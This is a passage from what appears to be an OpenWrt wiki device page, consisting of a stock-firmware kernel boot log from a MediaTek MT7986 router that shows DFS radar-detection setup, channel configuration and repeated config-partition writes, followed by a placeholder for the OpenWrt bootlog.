7986@C23L1rax0,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 104.186329] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6728: [RDM]: band_ch[0]: 0, band_ch[1]: 40 [ 104.195017] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6731: [RDM]: DfsChBand[0]: 0, DfsChBand[1]: 1 [ 104.203953] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6735: [RDM] BandIdx: 1, BW: 3, RDMode: 0 [ 104.212456] 7986@C08L1rax0,DfsRadarDetectStart() 6807: [RDM]: start RDD [ 104.220140] 7986@C23L1rax0,ap_phy_rrm_init_byRf() 2175: ap_phy_rrm_init_byRf: get realBw=3 (BW_80=2) by tpDfsGetBwByVhtBwAndHtBw [ 104.231683] 7986@C23L1rax0,ap_phy_rrm_init_byRf() 2180: ap_phy_rrm_init_byRf: Updated RaBf info bw by wdev ~~~, UpdatedRaBfInfoBwByWdev for MtkBw=3, realBw=3 (BW_80=2) [ 104.246699] 7986@C13L1rax0,ap_phy_rrm_init_byRf() 2147: Wlan_operate_init and switch channel for : rax7 [ 104.256297] operate_loader_phy: vap rax7, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 104.264484] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(40), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 104.276471] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(40), cen_ch_1(50), cen_ch_2(0),ext_cha(3), vht_bw(2)! [ 104.291339] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(40), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 104.305563] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 104.314174] 7986@C23L1rax0,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 104.322109] hc_radio_res_request(): radio is equal, prim_ch=40, rx stream:4! [ 104.329154] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 104.337764] 7986@C23L1rax0,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 104.345673] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6728: [RDM]: band_ch[0]: 0, band_ch[1]: 40 [ 104.354368] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6731: [RDM]: DfsChBand[0]: 0, DfsChBand[1]: 1 [ 104.363320] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6735: [RDM] BandIdx: 1, BW: 3, RDMode: 0 [ 104.371877] 7986@C08L1rax0,DfsRadarDetectStart() 6807: [RDM]: start RDD [ 104.379573] 7986@C00L1rax0,TpDfsApcliNeedAdjustBw() 5461: Apcli entry state error return. [ 104.387755] 7986@C13L1rax0,ap_phy_rrm_init_byRf() 2141: TpDfsApcliNeedAdjustBw=FALSE, not exec Wlan_operate_init for: apclix0 [ 108.895392] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 115.880006] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 142.541829] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 149.396548] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 155.953550] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 190.998767] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 193.765332] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 199.247719] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 201.222381] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 238.221106] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 243.371011] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 275.509756] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 288.002938] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 293.143056] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 316.520426] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 321.073138] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 353.779597] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 362.686000] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 368.480541] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 400.660914] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 409.404449] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 415.059393] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 421.572331] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 423.616412] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 425.486470] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 427.386129] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 429.327576] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 511.437120] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 513.506614] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 523.960631] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 526.432479] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 529.117118] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 543.326980] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 546.372245] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 584.862108] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 587.519627] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 589.973232] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 592.070740] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 613.478741] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 616.326147] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 618.658988] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 629.223719] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 634.050028] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 640.291422] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 646.980061] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 650.322420] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 669.950203] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 670.001267] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 733.130115] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 738.862700] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 750.858323] start write config partition...partition_offset is 0x1c0000, size = 0x10000


COPY HERE THE BOOTLOG ONCE OPENWRT IS INSTALLED AND RUNNING


This website uses cookies. By using the website, you agree with storing cookies on your computer. Also you acknowledge that you have read and understand our Privacy Policy. If you do not agree leave the website.More information about cookies
  • Last modified: 2024/02/12 08:58
  • by 127.0.0.1